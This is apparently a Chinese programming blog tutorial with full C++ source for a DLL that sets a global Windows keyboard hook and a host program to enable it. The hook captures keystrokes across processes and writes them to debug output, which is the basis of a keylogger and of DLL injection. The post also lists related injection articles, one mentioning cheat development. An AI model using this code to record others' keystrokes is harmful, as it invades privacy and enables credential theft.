消息钩子注入示例

最新推荐文章于 2023-10-06 21:05:45 发布
原创 最新推荐文章于 2023-10-06 21:05:45 发布 · 1.3k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了一个使用C++实现的键盘消息钩子(MessageHook.dll)的详细代码示例。该钩子可以捕获并记录用户的键盘输入,适用于Windows平台。文章通过具体的函数定义和调用流程展示了如何设置和取消消息钩子。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

MessageHook.dll的h文件:
#pragma  once
extern "C" _declspec(dllexport) bool OnHook();
extern "C" _declspec(dllexport) bool OffHook();

MessageHook.dll的cpp文件:
#include "stdafx.h"
#include "MessageHook.h"
#include <stdio.h>
#include <stdlib.h>
extern HMODULE g_hModule;
HHOOK g_Hook = 0;
LRESULT CALLBACK MyKeyBoard(_In_ int    code, _In_ WPARAM wParam, _In_ LPARAM lParam)
{
	// 判断是否wParam与lParam都有键盘消息,是的话则执行打印操作
	if (code == HC_ACTION){
		// 将256个虚拟键的状态拷贝到指定的缓冲区中,如果成功则继续
		BYTE KeyState[256] = { 0 };
		if (GetKeyboardState(KeyState)) {
			// 得到第16–23位,键盘虚拟码
			LONG  KeyInfo = lParam;
			UINT  keyCode = (KeyInfo >> 16) & 0x00ff;
			WCHAR wKeyCode = 0;
			ToAscii((UINT)wParam, keyCode, KeyState, (LPWORD)&wKeyCode, 0);
			// 将其打印出来
			WCHAR szInfo[512] = { 0 };
			swprintf_s(szInfo, _countof(szInfo), L"Hook%c", (char)wKeyCode);
			OutputDebugString(szInfo);
			return 0;
		}
	}

	return CallNextHookEx(g_Hook, code, wParam, lParam);
}

//开启消息钩子,拦截键盘消息
bool OnHook()
{
	g_Hook = SetWindowsHookEx(WH_KEYBOARD, MyKeyBoard, g_hModule, 0);
	if (g_Hook == NULL)
	{
		return false;
	}
	return true;
}
//关闭消息钩子
bool OffHook()
{
	if (g_Hook != NULL)
	{
		UnhookWindowsHookEx(g_Hook);
		return true;
	}
	return false;
}

dllmain的cpp文件:
#include "stdafx.h"
HMODULE g_hModule = 0;
BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
					 )
{
	switch (ul_reason_for_call)
	{
	case DLL_PROCESS_ATTACH:
		g_hModule = hModule;
		break;
	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
	case DLL_PROCESS_DETACH:
		break;
	}
	return TRUE;
}

调用cpp文件:
#include "stdafx.h"
#include <process.h>
#include "..\MessageHook\MessageHook.h"

#pragma comment(lib,"..\\debug\\MessageHook.lib")

int _tmain(int argc, _TCHAR* argv[])
{
	OnHook();
	system("pause");
	OffHook();
	return 0;
}

【C++】代码实现:全局钩子注入技术
风语留痕
07-26 6006
介绍 Windows 操作系统下程序全局钩子注入编程技术。
消息钩子代码实现
07-25
拦截windows窗口消息,代码中给出了拦截WM_COMMAND消息的例子
Windows核心编程_Hook
热门推荐
17岁boy的博客
06-22 1万+
一、前言Hook是Windows下的一个机制,Hook的中文意思是钩子的意思,顾名思义,钩子就是用来钩东西的,就好像钓鱼一样,你把鱼钩放入鱼塘里,钓到了某条鱼,即便我们不把鱼钓上来,我们可以通过鱼钩知道鱼在做什么,比如鱼飞速游动,鱼钩上的鱼线会做出反应,或者鱼原地不动,我们都可以通过鱼钩知道鱼在做什么!Windows就像一个鱼塘,而程序,就是鱼塘里的鱼,而用来监视这些鱼的鱼钩就是Hook!众所周知...
消息钩子函数入门篇--(3)示例__键盘钩子
dongbang3606的博客
05-15 341
下面是一个键盘钩子的示例,例子完成的任务是记录键盘的击键信息,保存到一个文件中。 1)建立MFC扩展DLL,设置工程名称为:KeyHook 2)在工程中添加KeyHook.h文件,然后加入键盘钩子类: class AFX_EXT_CLASS CKeyHook:public CObject{public:CKeyHook();~CKeyHook();bool SetKeyHoo...
消息钩子函数入门篇--(2)示例
dongbang3606的博客
05-15 164
由于全局钩子函数必须包含在动态链接库中,所以本例由两个程序体来实现。 1.建立钩子Mousehook.DLL    (1)选择MFC AppWizard(DLL)创建项目Mousehook; (2)选择MFC Extension DLL(共享MFC拷贝)类型;    (3)由于VC5没有现成的钩子类,所以要在项目目录中创建Mousehook.h文件,在其中建立钩子类:    clas...
Dll注入:Windows消息钩子注入
aijuzhou1959的博客
02-26 468
SetWindowsHook()是Windows消息处理机制的一个平台,应用程序可以在上面设置子程以监视指定窗口的某种消息,而且所监视的窗口可以是其他进程所创建的。当消息到达后,在目标窗口处理函数之前处理它。 钩子机制允许应用程序截获处理window消息或特定事件。 HHOOK WINAPI SetWindowsHookEx( __in int idHook, \\钩子类型 ...
DLL注入技术之消息钩子注入
03-22 834
DLL注入技术之消息钩子注入     消息钩子注入原理是利用Windows 系统中SetWindowsHookEx()这个API,他可以拦截目标进程的消息到指定的DLL中导出的函数,利用这个特性,我们可以将DLL注入到指定进程中。主要流程如下图所示: 1.准备阶段     需要编写一个DLL,并且显式导出MyMessageProc()函数,主要代码如下:
注入技术之消息钩子
whs100505的博客
02-10 365
原理:利用SetWindowsHookEx函数 #include <Windows.h> #include <Tlhelp32.h> BOOL SetWinHKInject(WCHAR* szProcess, WCHAR* szPath); UINT32 GetTargetThreadIdFromProcessName(WCHAR* ProcessName); //第...
消息钩子注入
qq_40363731的博客
03-27 147
【代码】消息钩子注入
易语言 注入源码 大全 远程线程注入 消息钩子注入 输入法注入 注册表注入 IAT永久注入 进程暂停注入 apc注入
11-20
在提供的压缩包文件中,"注入.e"很可能是易语言编写的一个或多个源代码示例,涉及到多种注入技术,包括远程线程注入消息钩子注入、输入法注入、注册表注入以及IAT(Import Address Table)永久注入和进程暂停注入...
NTProcDrv.rar_C# HOOK注入_钩子 注入
09-19
在“NTProcDrv.rar”这个压缩包中,可能包含了一个C#编写的DLL和相应的示例代码,展示了如何实现钩子注入。这个DLL可能包含了设置各种类型钩子的函数,而示例代码则演示了如何使用P/Invoke调用这些函数,以及如何将...
支持所有window所有平台的钩子注入应用层
10-09
winxp、win2003、vista、win7、win8 平台的32位和64位进程的钩子注入(已经应用在产品中)需要的朋友请下载。
利用钩子,DLL注入的方法及通讯源码.rar(C++)
03-06
利用钩子,DLL注入的方法及通讯源码,借鉴用于WAI GUA开发
使用全局和线程钩子注入DLL.rar
08-04
在“使用全局和线程钩子注入DLL”的主题中,你将学习如何结合这些技术来创建和管理钩子,以及如何将包含钩子函数的DLL注入到其他进程中。提供的PDF文档很可能会详细解释这些概念,并给出实际的代码示例,可能包括...
DLL注入示例课件源码
09-13
通过学习和分析提供的“DLL注入示例课件源码”,我们可以深入了解DLL注入的实现细节,理解如何在实践中使用这些技术。同时,了解这些知识也有助于提升对系统级编程和逆向工程的理解,对于软件开发、安全分析等领域都...
Windows钩子注入
weixin_46602723的博客
04-18 261
Windows钩子注入
Windows消息注入的方法
u014582865的博客
04-20 1254
从小就有一个成为黑客的梦想,总是有想做点坏事的冲动。但是总是力不从心,技术总是不够。去年11月份进了一家做插件的公司,我才知道原来是可以在别的软件上做点手脚啊。当时我们们公司是做关于两个软件的插件,一个软件是微软提供的,很常用的软件,由于提供了接口,根据提供的接口,我将我们产品中的数据弄到了别的软件中去了。还有另外一个软件,没有提供接口,很是苦恼。之后我分析SPY++这一工具分析了别人软件窗口的特
注入技术--消息hook注入
weixin_30500289的博客
03-17 132
1.简介 消息钩子注入. 对有窗口的进程. 容易被检测SetWindowsHookExW的参数1如果空,则卸载钩子 2.代码 HHOOK hook = 0; DWORD msgInject(WCHAR* dllpath,WCHAR* className, WCHAR* windowName) { if (!dllpath) { if (ho...
极安御信学习笔记——消息钩子注入
最新发布
tscg_的博客
10-06 268
钩子是WINDOWS中消息处理机制的一个要点,我们通过安装钩子,可以监视消息的传递,并能在消息到达目标窗口前提前进行处理。
全面解析鼠标全局钩子实现示例
这暗示源码可能被分为两个部分,一个是实现鼠标钩子功能的基础代码,另一个可能包含用于测试该功能的程序或示例。这样的分离有助于开发者将核心功能与测试代码区分开,便于理解和维护。 接下来,我们更详细地探讨...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值